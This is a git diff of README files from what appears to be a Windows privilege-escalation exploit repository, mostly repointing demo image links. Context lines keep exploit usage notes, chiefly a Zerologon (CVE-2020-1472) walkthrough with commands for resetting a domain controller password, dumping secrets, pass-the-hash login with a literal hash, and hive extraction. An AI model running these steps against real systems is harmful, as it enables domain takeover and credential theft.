改POC只对x86的机器有效,测试机器为Windows 7 SP1 x86 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif) diff --git a/CVE-2019-0623/README_EN.md b/CVE-2019-0623/README_EN.md index d5e8448..eb3bece 100644 --- a/CVE-2019-0623/README_EN.md +++ b/CVE-2019-0623/README_EN.md 
@@ -39,7 +39,7 @@ CompilerEnvironment POC is only valid for the X86 machine, the test machine is Windows 7 SP1 X86 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif) diff --git a/CVE-2019-0803/README.md b/CVE-2019-0803/README.md index eac5325..8f1449f 100644 --- a/CVE-2019-0803/README.md +++ b/CVE-2019-0803/README.md @@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803 这里测试机器是Windows Server 2008 R2 x64,上GIF图 -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif) #### 分析文章 - https://bbs.pediy.com/thread-260289.htm diff --git a/CVE-2019-0803/README_EN.md b/CVE-2019-0803/README_EN.md index cb7999b..286c011 100644 --- a/CVE-2019-0803/README_EN.md +++ b/CVE-2019-0803/README_EN.md @@ -40,7 +40,7 @@ CompilerEnvironment Here the test machine is Windows Server 2008 R2 X64, on the GIF map -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif) #### Analyze - https://bbs.pediy.com/thread-260289.htm diff --git a/CVE-2019-0808/README.md b/CVE-2019-0808/README.md index df15efb..53ffe67 100644 --- a/CVE-2019-0808/README.md +++ b/CVE-2019-0808/README.md @@ -25,7 +25,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808 - 编译有点问题 测试机器为Windows 7 SP1 x86 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif) diff --git a/CVE-2019-0808/README_EN.md b/CVE-2019-0808/README_EN.md index 5a6023c..5bf3301 100644 --- a/CVE-2019-0808/README_EN.md 
+++ b/CVE-2019-0808/README_EN.md @@ -26,7 +26,7 @@ CompilerEnvironment Test machine for Windows 7 SP1 X86 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif) diff --git a/CVE-2019-1388/README.md b/CVE-2019-1388/README.md index a2f960f..a09efe4 100644 --- a/CVE-2019-1388/README.md +++ b/CVE-2019-1388/README.md @@ -42,7 +42,7 @@ https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD 测试系统Windows 7 SP1 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif) #### 分析文章 - http://blog.leanote.com/post/snowming/38069f423c76 diff --git a/CVE-2019-1388/README_EN.md b/CVE-2019-1388/README_EN.md index 27c7c7a..4a498e3 100644 --- a/CVE-2019-1388/README_EN.md +++ b/CVE-2019-1388/README_EN.md @@ -42,7 +42,7 @@ https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD Test system Windows 7 SP1 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif) #### Analyze - http://blog.leanote.com/post/snowming/38069f423c76 diff --git a/CVE-2019-1458/README.md b/CVE-2019-1458/README.md index b6dcf31..611d5ed 100644 --- a/CVE-2019-1458/README.md +++ b/CVE-2019-1458/README.md @@ -39,7 +39,7 @@ cve-2019-1458.exe 测试系统Windows 7 SP1 x64 ,直接上GIF图 -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif) #### 分析文章 - https://github.com/piotrflorczyk/cve-2019-1458_POC diff --git a/CVE-2019-1458/README_EN.md b/CVE-2019-1458/README_EN.md index 6adf307..ecaf333 100644 --- a/CVE-2019-1458/README_EN.md 
+++ b/CVE-2019-1458/README_EN.md @@ -40,7 +40,7 @@ cve-2019-1458.exe Test system Windows 7 SP1 x64 ,Direct GIF map -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif) #### Analyze - https://github.com/piotrflorczyk/cve-2019-1458_POC diff --git a/CVE-2020-0668/README.md b/CVE-2020-0668/README.md index b176561..1ba5215 100644 --- a/CVE-2020-0668/README.md +++ b/CVE-2020-0668/README.md @@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0668 该EXP是使用提权进行文件迁移操作,如果想使用cmd需要自己修改代码,测试机器Windows 10 1709 X64,动图中是把**test.dll**移动到 `C:\Windows\System32`目录下,**test.dll**可以是任意文件。使用exe时需要把**NtApiDotNet.dll**文件放到同级目录 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif) > Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation. diff --git a/CVE-2020-0668/README_EN.md b/CVE-2020-0668/README_EN.md index cf79f94..d57ed98 100644 --- a/CVE-2020-0668/README_EN.md +++ b/CVE-2020-0668/README_EN.md @@ -42,7 +42,7 @@ CompilerEnvironment The exp is a file migration operation using rights, if you want to use CMD, you need to modify the code, test the machine Windows 10 1709 x64,The moving map is moved to the `C:\Windows\System32` directory, **Test.dll** can be any file. Put the **ntapidotNet.dll** file in the same level when using EXE -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif) > Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation. 
diff --git a/CVE-2020-0683/README.md b/CVE-2020-0683/README.md index dc1b9fd..de2a2e3 100644 --- a/CVE-2020-0683/README.md +++ b/CVE-2020-0683/README.md @@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0683 测试机器Windows 10 1909 X64,源码中只对指定文件进行写入信息,如果需要获取某项程序的权限,需要自行修改源码 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif) #### 分析文章 - [MSI_EoP_New.pdf](./MSI_EoP_New.pdf) diff --git a/CVE-2020-0683/README_EN.md b/CVE-2020-0683/README_EN.md index 434fdfb..677511a 100644 --- a/CVE-2020-0683/README_EN.md +++ b/CVE-2020-0683/README_EN.md @@ -42,7 +42,7 @@ CompilerEnvironment Test Machine Windows 10 1909 x64, only written information on the specified file in the source code, if you need to get the permissions of a program, you need to modify the source code yourself. -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif) #### Analyze diff --git a/CVE-2020-0787/README.md b/CVE-2020-0787/README.md index fc86f81..b67efdd 100644 --- a/CVE-2020-0787/README.md +++ b/CVE-2020-0787/README.md @@ -48,7 +48,7 @@ BitsArbitraryFileMoveExploit.exe 测试系统Windows 7 SP1 x64,直接上GIF图 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0787_win7_sp1_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0787_win7_sp1_x64.gif) #### 分析文章 - https://f5.pm/go-28382.html diff --git a/CVE-2020-0787/README_EN.md b/CVE-2020-0787/README_EN.md index 3e9ca70..ffbcaff 100644 --- a/CVE-2020-0787/README_EN.md +++ b/CVE-2020-0787/README_EN.md 
@@ -48,7 +48,7 @@ BitsArbitraryFileMoveExploit.exe Test system Windows 7 SP1 x64,Direct GIF map -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0787_win7_sp1_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0787_win7_sp1_x64.gif) #### Analyze - https://f5.pm/go-28382.html diff --git a/CVE-2020-0796/README.md b/CVE-2020-0796/README.md index 5fc1c00..8c7629c 100644 --- a/CVE-2020-0796/README.md +++ b/CVE-2020-0796/README.md @@ -39,11 +39,11 @@ ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4 Get-FileHash -Path c:/windows/system32/drivers/srv2.sys ``` -![image-20200810115258497](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0796_powershell.png) +![image-20200810115258497](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0796_powershell.png) 然后就直接上GIF图了 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0796_win10_1903_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0796_win10_1903_x64.gif) #### 分析文章 - https://paper.seebug.org/1168/ diff --git a/CVE-2020-0796/README_EN.md b/CVE-2020-0796/README_EN.md index 0c6924a..4be0a29 100644 --- a/CVE-2020-0796/README_EN.md +++ b/CVE-2020-0796/README_EN.md @@ -40,11 +40,11 @@ View MD5 value Get-FileHash -Path c:/windows/system32/drivers/srv2.sys ``` -![image-20200810115258497](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0796_powershell.png) +![image-20200810115258497](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0796_powershell.png) Then directly gif map -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0796_win10_1903_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0796_win10_1903_x64.gif) #### Analyze - https://paper.seebug.org/1168/ diff --git a/CVE-2020-1015/README.md b/CVE-2020-1015/README.md index 94013c9..736bf8a 100644 --- a/CVE-2020-1015/README.md 
+++ b/CVE-2020-1015/README.md @@ -49,7 +49,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015 测试机器Windows 10 1909 X64,会使CPU跑满导致蓝屏 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1015_win10_1909_x64_poc.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1015_win10_1909_x64_poc.gif) #### 分析文章 - https://0xeb-bp.com/blog/2020/05/12/cve-2020-1015-analysis.html diff --git a/CVE-2020-1015/README_EN.md b/CVE-2020-1015/README_EN.md index 292a0ef..0a070c9 100644 --- a/CVE-2020-1015/README_EN.md +++ b/CVE-2020-1015/README_EN.md @@ -49,7 +49,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015 Test Machine Windows 10 1909 x64, will make CPUs to lead blue screen -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1015_win10_1909_x64_poc.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1015_win10_1909_x64_poc.gif) #### Analyze - https://0xeb-bp.com/blog/2020/05/12/cve-2020-1015-analysis.html diff --git a/CVE-2020-1054/README.md b/CVE-2020-1054/README.md index 37ebe1d..1cf43e0 100644 --- a/CVE-2020-1054/README.md +++ b/CVE-2020-1054/README.md @@ -53,7 +53,7 @@ cargo build --release 接着直接在Windows 7 SP1 X64下运行即可 -![CVE-2020-1054](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1054_windows_7_x64.gif) +![CVE-2020-1054](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1054_windows_7_x64.gif) #### 分析文章 - https://www.anquanke.com/post/id/209329 diff --git a/CVE-2020-1054/README_EN.md b/CVE-2020-1054/README_EN.md index 66e8482..bf2785a 100644 --- a/CVE-2020-1054/README_EN.md +++ b/CVE-2020-1054/README_EN.md 
@@ -53,7 +53,7 @@ There are two points here to pay attention: Then run directly in Windows 7 SP1 X64 -![CVE-2020-1054](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1054_windows_7_x64.gif) +![CVE-2020-1054](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1054_windows_7_x64.gif) #### Analyze - https://www.anquanke.com/post/id/209329 diff --git a/CVE-2020-1313/README.md b/CVE-2020-1313/README.md index 41e37f2..ad141bb 100644 --- a/CVE-2020-1313/README.md +++ b/CVE-2020-1313/README.md @@ -29,7 +29,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1313 测试机器Windows 10 1909 x64如图所示 -![CVE-2020-1313_windos_10_1909_x64.gif](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1313_windos_10_1909_x64.gif) +![CVE-2020-1313_windos_10_1909_x64.gif](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1313_windos_10_1909_x64.gif) #### 分析文章 - https://cloud.tencent.com/developer/article/1683124 diff --git a/CVE-2020-1313/README_EN.md b/CVE-2020-1313/README_EN.md index 3bc2d7a..ba073c6 100644 --- a/CVE-2020-1313/README_EN.md +++ b/CVE-2020-1313/README_EN.md @@ -29,7 +29,7 @@ CompilerEnvironment Test Machine Windows 10 1909 x64 as shown -![CVE-2020-1313_windos_10_1909_x64.gif](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1313_windos_10_1909_x64.gif) +![CVE-2020-1313_windos_10_1909_x64.gif](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1313_windos_10_1909_x64.gif) #### Analyze - https://cloud.tencent.com/developer/article/1683124 diff --git a/CVE-2020-1337/README.md b/CVE-2020-1337/README.md index 08d914a..7aa0a4d 100644 --- a/CVE-2020-1337/README.md +++ b/CVE-2020-1337/README.md 
@@ -51,7 +51,7 @@ sailay1996写了一个PS1脚本,但是有个限制是需要重启机器,首 测试机器Windows 10 1909 x64如图所示 -![CVE-2020-1337_windos_10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1337_windos_10_1909_x64.gif) +![CVE-2020-1337_windos_10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1337_windos_10_1909_x64.gif) #### 分析文章 - https://bbs.pediy.com/thread-261557.htm diff --git a/CVE-2020-1337/README_EN.md b/CVE-2020-1337/README_EN.md index 93ae322..37a2892 100644 --- a/CVE-2020-1337/README_EN.md +++ b/CVE-2020-1337/README_EN.md @@ -51,7 +51,7 @@ Sailay1996 wrote a PS1 script, but there is a limit to restart the machine. Firs Test Machine Windows 10 1909 x64 as shown -![CVE-2020-1337_windos_10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1337_windos_10_1909_x64.gif) +![CVE-2020-1337_windos_10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1337_windos_10_1909_x64.gif) #### Analyze - https://bbs.pediy.com/thread-261557.htm diff --git a/CVE-2020-1472/README.md b/CVE-2020-1472/README.md index 65d938f..6d76ce4 100644 --- a/CVE-2020-1472/README.md +++ b/CVE-2020-1472/README.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 测试机器Windows Server 2008 R2 SP1 X64 ,并且设置环境为域控机器 -![image-20201002201920794](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_dc-server.png) +![image-20201002201920794](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_dc-server.png) 由上图可知: @@ -55,7 +55,7 @@ git clone --depth=1 https://github.com/SecureAuthCorp/impacket python3 CVE-2020-1472_Scan.py dc 192.168.183.171 ``` -![image-20201002203037104](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_scan.png) +![image-20201002203037104](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_scan.png) > 利用脚本 
@@ -66,7 +66,7 @@ python3 CVE-2020-1472_Scan.py dc 192.168.183.171 python3 CVE-2020-1472_Exploit.py dc 192.168.183.171 ``` -![image-20201002204223509](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_exp.png) +![image-20201002204223509](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_exp.png) 接着进入下载好的`impacket`项目,使用空密码登录 @@ -76,7 +76,7 @@ cd impacket/examples/ python3 secretsdump.py ascotbe.com/dc\$@192.168.183.171 -no-pass ``` -![image-20201002203751057](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_secretsdump.png) +![image-20201002203751057](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_secretsdump.png) 接着利用hash进行登录 @@ -85,7 +85,7 @@ python3 secretsdump.py ascotbe.com/dc\$@192.168.183.171 -no-pass python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:45280efa2300182b4f7fdc2cee182149 ascotbe.com/administrator@192.168.183.171 ``` -![image-20201002204817764](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_wmiexec.png) +![image-20201002204817764](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_wmiexec.png) > 还原密码 @@ -103,7 +103,7 @@ del sam.save del security.save ``` -![image-20201002205958192](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_hash.png) +![image-20201002205958192](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_hash.png) 接着进行解密 @@ -111,7 +111,7 @@ del security.save python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL ``` -![image-20201002210258903](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_decrypt_hash.png) +![image-20201002210258903](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_decrypt_hash.png) 可以看到这是之前修改之前的密码,接着回到桌面使用脚本恢复密码 
@@ -120,7 +120,7 @@ python3 secretsdump.py -sam sam.save -system system.save -security security.save python3 CVE-2020-1472_RestoreOriginalPassword.py dc 192.168.183.171 d4ac5a73fd3f13dfd9d6de036a9e99a2 ``` -![image-20201002212122966](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_restore_original_password.png) +![image-20201002212122966](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_restore_original_password.png) #### 分析文章 - https://xz.aliyun.com/t/8367 diff --git a/CVE-2020-1472/README_EN.md b/CVE-2020-1472/README_EN.md index 5bc2549..98bf45a 100644 --- a/CVE-2020-1472/README_EN.md +++ b/CVE-2020-1472/README_EN.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 Test system Windows Server 2008 R2 SP1 X64 ,And set the environment to domain control machine -![image-20201002201920794](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_dc-server.png) +![image-20201002201920794](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_dc-server.png) As you can know above: @@ -55,7 +55,7 @@ This script is used to test whether the machine has a vulnerability python3 CVE-2020-1472_Scan.py dc 192.168.183.171 ``` -![image-20201002203037104](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_scan.png) +![image-20201002203037104](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_scan.png) > Use script @@ -66,7 +66,7 @@ The script will reset the password to empty! ! It is easy to control the loss! ! python3 CVE-2020-1472_Exploit.py dc 192.168.183.171 ``` -![image-20201002204223509](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_exp.png) +![image-20201002204223509](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_exp.png) Then enter the downloaded `impacket` project, log in with an empty password 
@@ -76,7 +76,7 @@ cd impacket/examples/ python3 secretsdump.py ascotbe.com/dc\$@192.168.183.171 -no-pass ``` -![image-20201002203751057](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_secretsdump.png) +![image-20201002203751057](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_secretsdump.png) Then use HASH to log in @@ -85,7 +85,7 @@ Then use HASH to log in python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:45280efa2300182b4f7fdc2cee182149 ascotbe.com/administrator@192.168.183.171 ``` -![image-20201002204817764](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_wmiexec.png) +![image-20201002204817764](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_wmiexec.png) > Restore password @@ -103,7 +103,7 @@ del sam.save del security.save ``` -![image-20201002205958192](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_hash.png) +![image-20201002205958192](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_hash.png) Next to decrypt @@ -111,7 +111,7 @@ Next to decrypt python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL ``` -![image-20201002210258903](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_decrypt_hash.png) +![image-20201002210258903](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_decrypt_hash.png) You can see that this is the password before modifying, followed by back to the desktop using the script recovery password 
@@ -120,7 +120,7 @@ You can see that this is the password before modifying, followed by back to the python3 CVE-2020-1472_RestoreOriginalPassword.py dc 192.168.183.171 d4ac5a73fd3f13dfd9d6de036a9e99a2 ``` -![image-20201002212122966](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_restore_original_password.png) +![image-20201002212122966](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_restore_original_password.png) #### Analyze - https://xz.aliyun.com/t/8367 diff --git a/CVE-2020-16898/README.md b/CVE-2020-16898/README.md index 1159f42..0dd8c07 100644 --- a/CVE-2020-16898/README.md +++ b/CVE-2020-16898/README.md @@ -31,15 +31,15 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1689 测试机器Windows 10 1709 x64如图所示 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_ipv6_open.png) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_ipv6_open.png) 接着把CVE-2020-16898.py脚本中的IPV6地址修改下 -![image-20201023092109185](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_py.png) +![image-20201023092109185](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_py.png) 最后使用命令`pip install scapy`,安装依赖包,接着直接利用即可蓝屏 -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_win_10_1709.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_win_10_1709.gif) #### 分析文章 - https://www.anquanke.com/post/id/220862 diff --git a/CVE-2020-16898/README_EN.md b/CVE-2020-16898/README_EN.md index 40c3438..8b2bc59 100644 --- a/CVE-2020-16898/README_EN.md +++ b/CVE-2020-16898/README_EN.md 
@@ -32,15 +32,15 @@ At present, only the blue screen POC is public, and the amount is calculated as Test Machine Windows 10 1709 x64 as shown -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_ipv6_open.png) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_ipv6_open.png) Then the IPv6 address in the CVE-2020-16898.py script is then modified -![image-20201023092109185](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_py.png) +![image-20201023092109185](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_py.png) Finally use commands `Pip install scapy`, install dependency bag, then use it directly to use blue screen -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_win_10_1709.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_win_10_1709.gif) #### Analyze - https://www.anquanke.com/post/id/220862 diff --git a/CVE-2020-16938/README.md b/CVE-2020-16938/README.md index c64d865..ec2a65f 100644 --- a/CVE-2020-16938/README.md +++ b/CVE-2020-16938/README.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1693 直接利用7Z GUI的方式,即可在非管理员权限下查看config文件夹中的sam文件,而在Windows文件夹中查看会弹出UAC弹框 -![image-20201022162816397](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16938_win10_2004.png) +![image-20201022162816397](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16938_win10_2004.png) > 第二种方式 diff --git a/CVE-2020-16938/README_EN.md b/CVE-2020-16938/README_EN.md index 36de3e1..34a59d6 100644 --- a/CVE-2020-16938/README_EN.md +++ b/CVE-2020-16938/README_EN.md 
@@ -30,7 +30,7 @@ Test system Windows 10 2004 x64 Use the 7z GUI to view the SAM files in the Config folder, and view the UAC bomb box in the Windows folder. -![image-20201022162816397](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16938_win10_2004.png) +![image-20201022162816397](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16938_win10_2004.png) > Second way diff --git a/CVE-2021-1732/README.md b/CVE-2021-1732/README.md index d14b8c0..1a9b9bc 100644 --- a/CVE-2021-1732/README.md +++ b/CVE-2021-1732/README.md @@ -33,7 +33,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732 这里测试机器是Windows 10 1909 x64,上GIF图 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-1732_windows_10_1909_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-1732_windows_10_1909_x64.gif) #### 分析文章 - https://www.freebuf.com/vuls/270295.html diff --git a/CVE-2021-1732/README_EN.md b/CVE-2021-1732/README_EN.md index 4fddd87..34ccd64 100644 --- a/CVE-2021-1732/README_EN.md +++ b/CVE-2021-1732/README_EN.md @@ -34,7 +34,7 @@ CompilerEnvironment Here the test machine is Windows 10 1909 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-1732_windows_10_1909_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-1732_windows_10_1909_x64.gif) #### Analyze - https://www.freebuf.com/vuls/270295.html diff --git a/CVE-2021-26868/README.md b/CVE-2021-26868/README.md index f45cd6a..96b7501 100644 --- a/CVE-2021-26868/README.md +++ b/CVE-2021-26868/README.md 
@@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-2686 测试系统Windows 10 1909 X64 -![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) +![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) #### 代码来源 diff --git a/CVE-2021-26868/README_EN.md b/CVE-2021-26868/README_EN.md index 1091bea..397f9e8 100644 --- a/CVE-2021-26868/README_EN.md +++ b/CVE-2021-26868/README_EN.md @@ -41,7 +41,7 @@ CompilerEnvironment Test system Windows 10 1909 X64 -![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) +![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) #### ProjectSource diff --git a/CVE-2021-33739/README.md b/CVE-2021-33739/README.md index 15df648..c258243 100644 --- a/CVE-2021-33739/README.md +++ b/CVE-2021-33739/README.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-3373 测试系统Windows 10 1909 X64 